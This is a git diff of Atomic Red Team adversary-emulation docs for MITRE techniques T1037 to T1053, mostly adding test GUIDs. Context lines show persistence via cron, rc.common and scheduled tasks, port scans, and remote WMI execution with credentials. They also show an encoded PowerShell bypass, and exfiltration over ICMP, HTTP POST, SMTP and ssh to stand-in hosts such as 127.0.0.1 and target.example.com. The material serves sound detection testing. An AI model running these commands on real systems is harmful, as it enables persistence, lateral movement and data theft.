## Atomic Test #1 - Logon Scripts - Mac -Mac logon script +auto_generated_guid: f047c7de-a2d9-406e-a62b-12a09d9516f4 + +Mac logon script **Supported Platforms:** macOS diff --git a/atomics/T1037.004/T1037.004.md b/atomics/T1037.004/T1037.004.md index 5e258a38..94d9c640 100644 --- a/atomics/T1037.004/T1037.004.md +++ b/atomics/T1037.004/T1037.004.md @@ -20,10 +20,12 @@ Several Unix-like systems have moved to Systemd and deprecated the use of RC scr
## Atomic Test #1 - rc.common + +auto_generated_guid: 97a48daa-8bca-4bc0-b1a9-c1d163e762de + Modify rc.common [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html) - **Supported Platforms:** macOS @@ -46,8 +48,10 @@ sudo echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /e
## Atomic Test #2 - rc.common -Modify rc.common +auto_generated_guid: c33f3d80-5f04-419b-a13a-854d1cbdbf3a + +Modify rc.common **Supported Platforms:** Linux @@ -78,8 +82,10 @@ origfilename='/etc/rc.common.original';if [ ! -f $origfilename ];then sudo rm /e
## Atomic Test #3 - rc.local -Modify rc.local +auto_generated_guid: 126f71af-e1c9-405c-94ef-26a47b16c102 + +Modify rc.local **Supported Platforms:** Linux diff --git a/atomics/T1037.005/T1037.005.md b/atomics/T1037.005/T1037.005.md index 808ac4eb..516684aa 100644 --- a/atomics/T1037.005/T1037.005.md +++ b/atomics/T1037.005/T1037.005.md @@ -14,10 +14,12 @@ An adversary can create the appropriate folders/files in the StartupItems direct
## Atomic Test #1 - Add file to Local Library StartupItems + +auto_generated_guid: 134627c3-75db-410e-bff8-7a920075f198 + Modify or create an file in /Library/StartupItems [Reference](https://www.alienvault.com/blogs/labs-research/diversity-in-recent-mac-malware) - **Supported Platforms:** macOS diff --git a/atomics/T1040/T1040.md b/atomics/T1040/T1040.md index b1a21362..e2cb05d4 100644 --- a/atomics/T1040/T1040.md +++ b/atomics/T1040/T1040.md @@ -20,17 +20,19 @@ Network sniffing may also reveal configuration details, such as running services
## Atomic Test #1 - Packet Capture Linux + +auto_generated_guid: 7fe741f7-b265-4951-a7c7-320889083b3e + Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be installed. Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33. - **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | interface | Specify interface to perform PCAP on. | String | ens33| @@ -50,7 +52,7 @@ tshark -c 5 -i #{interface} ##### Description: Check if at least one of the tools are installed on the machine. ##### Check Prereq Commands: ```bash -if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; +if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; ``` ##### Get Prereq Commands: ```bash @@ -64,17 +66,19 @@ echo "Install tcpdump and/or tshark for the test to run."; exit 1;
## Atomic Test #2 - Packet Capture macOS + +auto_generated_guid: 9d04efee-eff5-4240-b8d2-07792b873608 + Perform a PCAP on macOS. This will require Wireshark/tshark to be installed. TCPdump may already be installed. Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface en0A. - **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | interface | Specify interface to perform PCAP on. | String | en0A| @@ -94,7 +98,7 @@ if [ -x "$(command -v tshark)" ]; then sudo tshark -c 5 -i #{interface}; fi; ##### Description: Check if at least one of the tools are installed on the machine. ##### Check Prereq Commands: ```bash -if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; +if [ ! -x "$(command -v tcpdump)" ] && [ ! -x "$(command -v tshark)" ]; then exit 1; else exit 0; fi; ``` ##### Get Prereq Commands: ```bash @@ -108,18 +112,20 @@ echo "Install tcpdump and/or tshark for the test to run."; exit 1;
## Atomic Test #3 - Packet Capture Windows Command Prompt + +auto_generated_guid: a5b2f6a0-24b4-493e-9590-c699f75723ca + Perform a packet capture using the windows command prompt. This will require a host that has Wireshark/Tshark installed. Upon successful execution, tshark will execute and capture 5 packets on interface "Ethernet". - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | interface | Specify interface to perform PCAP on. | String | Ethernet| | wireshark_url | wireshark installer download URL | url | https://1.eu.dl.wireshark.org/win64/Wireshark-win64-3.4.5.exe| @@ -142,7 +148,7 @@ Upon successful execution, tshark will execute and capture 5 packets on interfac ##### Description: tshark must be installed and in the default path of "c:\Program Files\Wireshark\Tshark.exe". ##### Check Prereq Commands: ```powershell -if (test-path "#{tshark_path}") {exit 0} else {exit 1} +if (test-path "#{tshark_path}") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -152,7 +158,7 @@ Start-Process $env:temp\wireshark_installer.exe /S ##### Description: npcap must be installed. ##### Check Prereq Commands: ```powershell -if (test-path "#{npcap_path}") {exit 0} else {exit 1} +if (test-path "#{npcap_path}") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -167,9 +173,11 @@ Start-Process $env:temp\npcap_installer.exe
## Atomic Test #4 - Windows Internal Packet Capture + +auto_generated_guid: b5656f67-d67f-4de8-8e62-b5581630f528 + Uses the built-in Windows packet capture After execution you should find a file named trace.etl and trace.cab in the temp directory - **Supported Platforms:** Windows diff --git a/atomics/T1046/T1046.md b/atomics/T1046/T1046.md index 6da6944c..f921f6a0 100644 --- a/atomics/T1046/T1046.md +++ b/atomics/T1046/T1046.md @@ -18,10 +18,12 @@ Within cloud environments, adversaries may attempt to discover services running
## Atomic Test #1 - Port Scan + +auto_generated_guid: 68e907da-2539-48f6-9fc9-257a78c05540 + Scan ports to check for listening ports. Upon successful execution, sh will perform a network connection against a single host (192.168.1.1) and determine what ports are open in the range of 1-65535. Results will be via stdout. - **Supported Platforms:** Linux, macOS @@ -47,17 +49,19 @@ done
## Atomic Test #2 - Port Scan Nmap + +auto_generated_guid: 515942b0-a09f-4163-a7bb-22fefb6f185f + Scan ports to check for listening ports with Nmap. Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of adresseses on port 80 to determine if listening. Results will be via stdout. - **Supported Platforms:** Linux, macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | host | Host to scan. | string | 192.168.1.1| | port | Ports to scan. | string | 80| @@ -80,7 +84,7 @@ nc -nv #{host} #{port} ##### Description: Check if nmap command exists on the machine ##### Check Prereq Commands: ```sh -if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi; +if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi; ``` ##### Get Prereq Commands: ```sh @@ -94,15 +98,17 @@ echo "Install nmap on the machine to run the test."; exit 1;
## Atomic Test #3 - Port Scan NMap for Windows -Scan ports to check for listening ports for the local host 127.0.0.1 +auto_generated_guid: d696a3cb-d7a8-4976-8eb5-5af4abf2e3df + +Scan ports to check for listening ports for the local host 127.0.0.1 **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | nmap_url | NMap installer download URL | url | https://nmap.org/dist/nmap-7.80-setup.exe| | host_to_scan | The host to scan with NMap | string | 127.0.0.1| @@ -122,7 +128,7 @@ nmap #{host_to_scan} ##### Description: NMap must be installed ##### Check Prereq Commands: ```powershell -if (cmd /c "nmap 2>nul") {exit 0} else {exit 1} +if (cmd /c "nmap 2>nul") {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell @@ -137,15 +143,17 @@ Start-Process $env:temp\nmap-7.80-setup.exe /S
## Atomic Test #4 - Port Scan using python -Scan ports to check for listening ports with python +auto_generated_guid: 6ca45b04-9f15-4424-b9d3-84a217285a5c + +Scan ports to check for listening ports with python **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | host_ip | Host to scan. | string | 127.0.0.1| | filename | Location of the project file | Path | PathToAtomicsFolder\T1046\src\T1046.py| @@ -165,7 +173,7 @@ python #(unknown) -i #{host_ip} ##### Description: Check if python exists on the machine ##### Check Prereq Commands: ```powershell -if (python --version) {exit 0} else {exit 1} +if (python --version) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1047/T1047.md b/atomics/T1047/T1047.md index ca7319d7..eb510624 100644 --- a/atomics/T1047/T1047.md +++ b/atomics/T1047/T1047.md @@ -26,9 +26,11 @@ An adversary can use WMI to interact with local and remote systems and use it as
## Atomic Test #1 - WMI Reconnaissance Users + +auto_generated_guid: c107778c-dcf5-47c5-af2e-1d058a3df3ea + An adversary might use WMI to list all local User Accounts. When the test completes , there should be local user accounts information displayed on the command line. - **Supported Platforms:** Windows @@ -51,9 +53,11 @@ wmic useraccount get /ALL /format:csv
## Atomic Test #2 - WMI Reconnaissance Processes + +auto_generated_guid: 5750aa16-0e59-4410-8b9a-8a47ca2788e2 + An adversary might use WMI to list Processes running on the compromised host. When the test completes , there should be running processes listed on the command line. - **Supported Platforms:** Windows @@ -76,9 +80,11 @@ wmic process get caption,executablepath,commandline /format:csv
## Atomic Test #3 - WMI Reconnaissance Software + +auto_generated_guid: 718aebaa-d0e0-471a-8241-c5afa69c7414 + An adversary might use WMI to list installed Software hotfix and patches. When the test completes, there should be a list of installed patches and when they were installed. - **Supported Platforms:** Windows @@ -101,19 +107,21 @@ wmic qfe get description,installedOn /format:csv
## Atomic Test #4 - WMI Reconnaissance List Remote Services + +auto_generated_guid: 0fd48ef7-d890-4e93-a533-f7dedd5191d3 + An adversary might use WMI to check if a certain Remote Service is running on a remote device. When the test completes, a service information will be displayed on the screen if it exists. A common feedback message is that "No instance(s) Available" if the service queried is not running. A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the provided remote host is unreacheable - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | node | Ip Address | String | 127.0.0.1| | service_search_string | Name Of Service | String | Spooler| @@ -135,16 +143,18 @@ wmic /node:"#{node}" service where (caption like "%#{service_search_string}%")
## Atomic Test #5 - WMI Execute Local Process + +auto_generated_guid: b3bdfc91-b33e-4c6d-a5c8-d64bee0276b3 + This test uses wmic.exe to execute a process on the local host. When the test completes , a new process will be started locally .A notepad application will be started when input is left on default. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | process_to_execute | Name or path of process to execute. | String | notepad.exe| @@ -169,17 +179,19 @@ wmic process where name='#{process_to_execute}' delete >nul 2>&1
## Atomic Test #6 - WMI Execute Remote Process + +auto_generated_guid: 9c8ef159-c666-472f-9874-90c8d60d136b + This test uses wmic.exe to execute a process on a remote host. Specify a valid value for remote IP using the node parameter. To clean up, provide the same node input as the one provided to run the test A common error message is "Node - (provided IP or default) ERROR Description =The RPC server is unavailable" if the default or provided IP is unreachable - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | node | Ip Address | String | 127.0.0.1| | user_name | Username | String | DOMAIN\Administrator| @@ -207,6 +219,9 @@ wmic /user:#{user_name} /password:#{password} /node:"#{node}" process where name
## Atomic Test #7 - Create a Process using WMI Query and an Encoded Command + +auto_generated_guid: 7db7a7f9-9531-4840-9b30-46220135441c + Solarigate persistence is achieved via backdoors deployed via various techniques including using PowerShell with an EncodedCommand Powershell -nop -exec bypass -EncodedCommand Where the –EncodedCommand, once decoded, would resemble: @@ -214,7 +229,6 @@ Where the –EncodedCommand, once decoded, would resemble: The EncodedCommand in this atomic is the following: Invoke-WmiMethod -Path win32_process -Name create -ArgumentList notepad.exe You should expect to see notepad.exe running after execution of this test. [Solarigate Analysis from Microsoft](https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/) - **Supported Platforms:** Windows @@ -237,16 +251,18 @@ powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhA
## Atomic Test #8 - Create a Process using obfuscated Win32_Process + +auto_generated_guid: 10447c83-fc38-462a-a936-5102363b1c43 + This test tries to mask process creation by creating a new class that inherits from Win32_Process. Indirect call of suspicious method such as Win32_Process::Create can break detection logic. [Cybereason blog post No Win32_ProcessNeeded](https://www.cybereason.com/blog/wmi-lateral-movement-win32) - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | new_class | Derived class name | String | Win32_Atomic| | process_to_execute | Name or path of process to execute. | String | notepad.exe| diff --git a/atomics/T1048.003/T1048.003.md b/atomics/T1048.003/T1048.003.md index 7a658ca8..0390ce51 100644 --- a/atomics/T1048.003/T1048.003.md +++ b/atomics/T1048.003/T1048.003.md @@ -20,10 +20,12 @@ Adversaries may opt to obfuscate this data, without the use of encryption, withi
## Atomic Test #1 - Exfiltration Over Alternative Protocol - HTTP + +auto_generated_guid: 1d1abbd6-a3d3-4b2e-bef5-c59293f46eff + A firewall rule (iptables or firewalld) will be needed to allow exfiltration on port 1337. Upon successful execution, sh will be used to make a directory (/tmp/victim-staging-area), write a txt file, and host the directory with Python on port 1337, to be later downloaded. - **Supported Platforms:** macOS, Linux @@ -54,17 +56,19 @@ Upon successful execution, sh will be used to make a directory (/tmp/victim-stag
## Atomic Test #2 - Exfiltration Over Alternative Protocol - ICMP + +auto_generated_guid: dd4b4421-2e25-4593-90ae-7021947ad12e + Exfiltration of specified file over ICMP protocol. Upon successful execution, powershell will utilize ping (icmp) to exfiltrate notepad.exe to a remote address (default 127.0.0.1). Results will be via stdout. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_file | Path to file to be exfiltrated. | Path | C:\Windows\System32\notepad.exe| | ip_address | Destination IP address where the data should be sent. | String | 127.0.0.1| @@ -86,8 +90,10 @@ $ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Cont
## Atomic Test #3 - Exfiltration Over Alternative Protocol - DNS -Exfiltration of specified file over DNS protocol. +auto_generated_guid: c403b5a4-b5fc-49f2-b181-d1c80d27db45 + +Exfiltration of specified file over DNS protocol. **Supported Platforms:** Linux @@ -116,16 +122,18 @@ Exfiltration of specified file over DNS protocol.
## Atomic Test #4 - Exfiltration Over Alternative Protocol - HTTP + +auto_generated_guid: 6aa58451-1121-4490-a8e9-1dada3f1c68c + Exfiltration of specified file over HTTP. Upon successful execution, powershell will invoke web request using POST method to exfiltrate notepad.exe to a remote address (default http://127.0.0.1). Results will be via stdout. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_file | Path to file to exfiltrate | Path | C:\Windows\System32\notepad.exe| | ip_address | Destination IP address where the data should be sent | String | http://127.0.0.1| @@ -148,16 +156,18 @@ Invoke-WebRequest -Uri #{ip_address} -Method POST -Body $content
## Atomic Test #5 - Exfiltration Over Alternative Protocol - SMTP + +auto_generated_guid: ec3a835e-adca-4c7c-88d2-853b69c11bb9 + Exfiltration of specified file over SMTP. Upon successful execution, powershell will send an email with attached file to exfiltrateto a remote address. Results will be via stdout. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_file | Path to file to exfiltrate | Path | C:\Windows\System32\notepad.exe| | sender | The email address of the sender | String | test@corp.com| diff --git a/atomics/T1048/T1048.md b/atomics/T1048/T1048.md index 6e6ecf17..e60fdc42 100644 --- a/atomics/T1048/T1048.md +++ b/atomics/T1048/T1048.md @@ -16,19 +16,21 @@ Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network pr
## Atomic Test #1 - Exfiltration Over Alternative Protocol - SSH + +auto_generated_guid: f6786cc8-beda-4915-a4d6-ac2f193bb988 + Input a domain and test Exfiltration over SSH Remote to Local Upon successful execution, sh will spawn ssh contacting a remote domain (default: target.example.com) writing a tar.gz file. - **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | domain | target SSH domain | url | target.example.com| @@ -49,19 +51,21 @@ ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
## Atomic Test #2 - Exfiltration Over Alternative Protocol - SSH + +auto_generated_guid: 7c3cb337-35ae-4d06-bf03-3032ed2ec268 + Input a domain and test Exfiltration over SSH Local to Remote Upon successful execution, tar will compress /Users/* directory and password protect the file modification of `Users.tar.gz.enc` as output. - **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | user_name | username for domain | string | atomic| | password | password for user | string | atomic| diff --git a/atomics/T1049/T1049.md b/atomics/T1049/T1049.md index 414e5e25..192508b7 100644 --- a/atomics/T1049/T1049.md +++ b/atomics/T1049/T1049.md @@ -20,10 +20,12 @@ Utilities and commands that acquire this information include [netstat](https://a
## Atomic Test #1 - System Network Connections Discovery + +auto_generated_guid: 0940a971-809a-48f1-9c4d-b1d785e96ee5 + Get a listing of network connections. Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. Results will output via stdout. - **Supported Platforms:** Windows @@ -48,10 +50,12 @@ net sessions
## Atomic Test #2 - System Network Connections Discovery with PowerShell + +auto_generated_guid: f069f0f1-baad-4831-aa2b-eddac4baac4a + Get a listing of network connections. Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout. - **Supported Platforms:** Windows @@ -74,10 +78,12 @@ Get-NetTCPConnection
## Atomic Test #3 - System Network Connections Discovery Linux & MacOS + +auto_generated_guid: 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 + Get a listing of network connections. Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout. - **Supported Platforms:** Linux, macOS @@ -99,7 +105,7 @@ who -a ##### Description: Check if netstat command exists on the machine ##### Check Prereq Commands: ```sh -if [ -x "$(command -v netstat)" ]; then exit 0; else exit 1; fi; +if [ -x "$(command -v netstat)" ]; then exit 0; else exit 1; fi; ``` ##### Get Prereq Commands: ```sh @@ -113,17 +119,19 @@ echo "Install netstat on the machine."; exit 1;
## Atomic Test #4 - System Discovery using SharpView + +auto_generated_guid: 96f974bb-a0da-4d87-a744-ff33e73367e9 + Get a listing of network connections, domains, domain users, and etc. sharpview.exe located in the bin folder, an opensource red-team tool. Upon successful execution, cmd.exe will execute sharpview.exe . Results will output via stdout. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | SharpView_url | sharpview download URL | url | https://github.com/tevora-threat/SharpView/blob/b60456286b41bb055ee7bc2a14d645410cca9b74/Compiled/SharpView.exe?raw=true| | SharpView | Path of the executable opensource redteam tool used for the performing this atomic. | path | PathToAtomicsFolder\T1049\bin\SharpView.exe| @@ -146,7 +154,7 @@ foreach ($syntax in $syntaxList) { ##### Description: Sharpview.exe must exist on disk at specified location (#{SharpView}) ##### Check Prereq Commands: ```powershell -if (Test-Path #{SharpView}) {exit 0} else {exit 1} +if (Test-Path #{SharpView}) {exit 0} else {exit 1} ``` ##### Get Prereq Commands: ```powershell diff --git a/atomics/T1053.001/T1053.001.md b/atomics/T1053.001/T1053.001.md index 03205105..77547ae1 100644 --- a/atomics/T1053.001/T1053.001.md +++ b/atomics/T1053.001/T1053.001.md @@ -12,15 +12,17 @@ An adversary may use [at](https://attack.mitre.org/software/S0110) in Linux envi
## Atomic Test #1 - At - Schedule a job -This test submits a command to be run in the future by the `at` daemon. +auto_generated_guid: 7266d898-ac82-4ec0-97c7-436075d0d08e + +This test submits a command to be run in the future by the `at` daemon. **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | time_spec | Time specification of when the command should run | String | now + 1 minute| | at_command | The command to be run | String | echo Hello from Atomic Red Team| @@ -40,7 +42,7 @@ echo "#{at_command}" | at #{time_spec} ##### Description: The `at` and `atd` executables must exist in the PATH ##### Check Prereq Commands: ```sh -which at && which atd +which at && which atd ``` ##### Get Prereq Commands: ```sh @@ -49,7 +51,7 @@ echo 'Please install `at` and `atd`; they were not found in the PATH (Package na ##### Description: The `atd` daemon must be running ##### Check Prereq Commands: ```sh -systemctl status atd || service atd status +systemctl status atd || service atd status ``` ##### Get Prereq Commands: ```sh diff --git a/atomics/T1053.002/T1053.002.md b/atomics/T1053.002/T1053.002.md index 63774d6d..0e22c703 100644 --- a/atomics/T1053.002/T1053.002.md +++ b/atomics/T1053.002/T1053.002.md @@ -14,11 +14,13 @@ Note: The at.exe command line utility has been deprecated in curren
## Atomic Test #1 - At.exe Scheduled task + +auto_generated_guid: 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 + Executes cmd.exe Note: deprecated in Windows 8+ Upon successful execution, cmd.exe will spawn at.exe and create a scheduled task that will spawn cmd at a specific time. - **Supported Platforms:** Windows diff --git a/atomics/T1053.003/T1053.003.md b/atomics/T1053.003/T1053.003.md index 7cda336c..47c5272a 100644 --- a/atomics/T1053.003/T1053.003.md +++ b/atomics/T1053.003/T1053.003.md @@ -16,15 +16,17 @@ An adversary may use cron in Linux or Unix environments to execute
## Atomic Test #1 - Cron - Replace crontab with referenced file -This test replaces the current user's crontab file with the contents of the referenced file. This technique was used by numerous IoT automated exploitation attacks. +auto_generated_guid: 435057fb-74b1-410e-9403-d81baf194f75 + +This test replaces the current user's crontab file with the contents of the referenced file. This technique was used by numerous IoT automated exploitation attacks. **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | command | Command to execute | string | /tmp/evil.sh| | tmp_cron | Temporary reference file to hold evil cron schedule | path | /tmp/persistevil| @@ -51,15 +53,17 @@ crontab /tmp/notevil
## Atomic Test #2 - Cron - Add script to all cron subfolders -This test adds a script to /etc/cron.hourly, /etc/cron.daily, /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. +auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 + +This test adds a script to /etc/cron.hourly, /etc/cron.daily, /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. **Supported Platforms:** macOS, Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | command | Command to execute | string | echo 'Hello from Atomic Red Team' > /tmp/atomic.log| | cron_script_name | Name of file to store in cron folder | string | persistevil| @@ -91,15 +95,17 @@ rm /etc/cron.weekly/#{cron_script_name}
## Atomic Test #3 - Cron - Add script to /var/spool/cron/crontabs/ folder -This test adds a script to a /var/spool/cron/crontabs folder configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. +auto_generated_guid: 2d943c18-e74a-44bf-936f-25ade6cccab4 + +This test adds a script to a /var/spool/cron/crontabs folder configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | command | Command to execute | string | echo 'Hello from Atomic Red Team' > /tmp/atomic.log| | cron_script_name | Name of file to store in /var/spool/cron/crontabs folder | string | persistevil| diff --git a/atomics/T1053.004/T1053.004.md b/atomics/T1053.004/T1053.004.md index 14817e59..bed322f3 100644 --- a/atomics/T1053.004/T1053.004.md +++ b/atomics/T1053.004/T1053.004.md @@ -12,15 +12,17 @@ An adversary may use the launchd daemon in macOS environments to sc
## Atomic Test #1 - Event Monitor Daemon Persistence -This test adds persistence via a plist to execute via the macOS Event Monitor Daemon. +auto_generated_guid: 11979f23-9b9d-482a-9935-6fc9cd022c3e + +This test adds persistence via a plist to execute via the macOS Event Monitor Daemon. **Supported Platforms:** macOS #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | script_location | evil plist location | path | $PathToAtomicsFolder/T1053.004/src/atomicredteam_T1053_004.plist| | script_destination | Path where to move the evil plist | path | /etc/emond.d/rules/atomicredteam_T1053_004.plist| diff --git a/atomics/T1053.005/T1053.005.md b/atomics/T1053.005/T1053.005.md index a290333a..9fd444d6 100644 --- a/atomics/T1053.005/T1053.005.md +++ b/atomics/T1053.005/T1053.005.md @@ -24,9 +24,11 @@ An adversary may use Windows Task Scheduler to execute programs at system startu
## Atomic Test #1 - Scheduled Task Startup Script + +auto_generated_guid: fec27f65-db86-4c2d-b66c-61945aee87c2 + Run an exe on user logon or system startup. Upon execution, success messages will be displayed for the two scheduled tasks. To view the tasks, open the Task Scheduler and look in the Active Tasks pane. - **Supported Platforms:** Windows @@ -55,15 +57,17 @@ schtasks /delete /tn "T1053_005_OnStartup" /f >nul 2>&1
## Atomic Test #2 - Scheduled task Local -Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. +auto_generated_guid: 42f53695-ad4a-4546-abb6-7d837f644a71 + +Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | task_command | What you want to execute | String | C:\windows\system32\cmd.exe| | time | What time 24 Hour | String | 72600| @@ -89,17 +93,19 @@ SCHTASKS /Delete /TN spawn /F >nul 2>&1
## Atomic Test #3 - Scheduled task Remote + +auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd + Create a task on a remote system. Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10 on a remote endpoint. - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | task_command | What you want to execute | String | C:\windows\system32\cmd.exe| | time | What time 24 Hour | String | 72600| @@ -128,10 +134,12 @@ SCHTASKS /Delete /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task"
## Atomic Test #4 - Powershell Cmdlet Scheduled Task + +auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd + Create an atomic scheduled task that leverages native powershell cmdlets. Upon successful execution, powershell.exe will create a scheduled task to spawn cmd.exe at 20:10. - **Supported Platforms:** Windows @@ -163,16 +171,18 @@ Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1
## Atomic Test #5 - Task Scheduler via VBA + +auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 + This module utilizes the Windows API to schedule a task for code execution (notepad.exe). The task scheduler will execute "notepad.exe" within 30 - 40 seconds after this module has run - **Supported Platforms:** Windows #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | ms_product | Maldoc application Word | String | Word| @@ -198,7 +208,7 @@ try { $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"} Stop-Process -Name $process exit 0 -} catch { exit 1 } +} catch { exit 1 } ``` ##### Get Prereq Commands: ```powershell @@ -212,8 +222,10 @@ Write-Host "You will need to install Microsoft #{ms_product} manually to meet th
## Atomic Test #6 - WMI Invoke-CimMethod Scheduled Task -Create an scheduled task that executes notepad.exe after user login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. +auto_generated_guid: e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b + +Create an scheduled task that executes notepad.exe after user login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. **Supported Platforms:** Windows diff --git a/atomics/T1053.006/T1053.006.md b/atomics/T1053.006/T1053.006.md index 4df70d46..998c17fb 100644 --- a/atomics/T1053.006/T1053.006.md +++ b/atomics/T1053.006/T1053.006.md @@ -14,15 +14,17 @@ An adversary may use systemd timers to execute malicious code at system startup
## Atomic Test #1 - Create Systemd Service and Timer -This test creates Systemd service and timer then starts and enables the Systemd timer +auto_generated_guid: f4983098-bb13-44fb-9b2c-46149961807b + +This test creates Systemd service and timer then starts and enables the Systemd timer **Supported Platforms:** Linux #### Inputs: -| Name | Description | Type | Default Value | +| Name | Description | Type | Default Value | |------|-------------|------|---------------| | path_to_systemd_service | Path to systemd service unit file | Path | /etc/systemd/system/art-timer.service| | path_to_systemd_timer | Path to service timer file | Path | /etc/systemd/system/art-timer.timer| diff --git a/atomics/T1053.007/T1053.007.md b/atomics/T1053.007/T1053.007.md index b571a9a7..eefb07ca 100644 --- a/atomics/T1053.007/T1053.007.md +++ b/atomics/T1053.007/T1053.007.md @@ -14,15 +14,17 @@ In Kubernetes, a CronJob may be used to schedule a Job that runs one or more con
